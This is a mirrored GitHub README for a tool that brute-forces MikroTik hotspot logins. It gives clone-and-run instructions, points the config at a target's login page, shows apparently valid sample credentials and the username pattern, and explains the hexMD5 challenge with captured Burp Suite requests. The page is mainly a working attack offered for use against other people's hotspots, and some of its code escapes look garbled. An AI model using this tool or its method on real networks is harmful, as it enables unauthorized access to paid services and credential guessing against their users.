Giters

RomeoMurmu / BruteForce-HOTSPOT-Mikrotik

Attacking by brute force hotspot login of mikrotik. The attack was only tested for the users of 1 hour, it is necessary to see the pattern of the users of a month.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Brute-force attack login

The attack was only tested for the users of 1 hour, it is necessary to see the pattern of the users of a month.

How to use this tool?

git clone --depth=1 https://github.com/Juvenal-Yescas/Brute-force-Mikrotik.git

Edit file conf.json change http://localjuve.com by the login page of the hotspot to attack (example http://hotspotmikrotik.com)

Execute this command.

$ node hck-mikro.js

The data.js file contains the list of possible users and passwords, can generate more users and passwords using Tools/dig-Generate-File.py

Analysis

Login

Example data valid.

username=1hjtd
password=263

alt text

username=1hmtw
password=423

alt text

The ip addres is this

alt text

How to attack?

The pattern is 1h for username

username=1hjtd
password=263

By right clicking > View source code for this page, You can see that the values to create a secure password are changing on the function doLogin(), this complicates attacking directly through a direct post you plain text, the post should be done with the password already encrypted.

document.sendin.password.value = hexMD5('\075' + document.login.password.value + '\532\742\124\412\422\545\965\162\943\173\846\825\842\857\139\184');
document.sendin.password.value = hexMD5('\123' + document.login.password.value + '\624\077\174\275\022\150\314\272\032\201\122\170\154\311\235\102');
Capturing request with burpsuite
username=1hjtd&password=6e7651ee150309d7da25cb30329368e2&dst=&popup=true
username=1hjtd&password=9f788a4e692207e71cdffbb921b8f8f1&dst=&popup=true
username=1hjtd&password=9f788a4e692207e71cdffbb921b8f8f1&dst=&popup=true
username=1hjtd&password=1d44ed0532a8d99b41ea8864352d9e59&dst=&popup=true
username=1hjtd&password=99b033a5dbd6ff867c265c05170e0ef1&dst=&popup=true
username=1hjtd&password=9f2611a4b2ff7f42b9e72758aeb28a52&dst=&popup=true
username=1hjtd&password=d62418f1793ab0dec2754a088d21d534&dst=&popup=true
username=1hjtd&password=d62418f1793ab0dec2754a088d21d534&dst=&popup=true
username=1hjtd&password=00cfe5b8e01a385d18a29b459f349823&dst=&popup=true

Note: The password changes every time a request is made.

Post example to attack
username: 1hjtd
password: 00cfe5b8e01a385d18a29b459f349823

burpsuite capture: 

username=1hjtd&password=00cfe5b8e01a385d18a29b459f349823&dst=&popup=true

License FOSSA Status

FOSSA Status

About

Attacking by brute force hotspot login of mikrotik. The attack was only tested for the users of 1 hour, it is necessary to see the pattern of the users of a month.

License:MIT License

Languages

Language:JavaScript 97.8%Language:Python 2.2%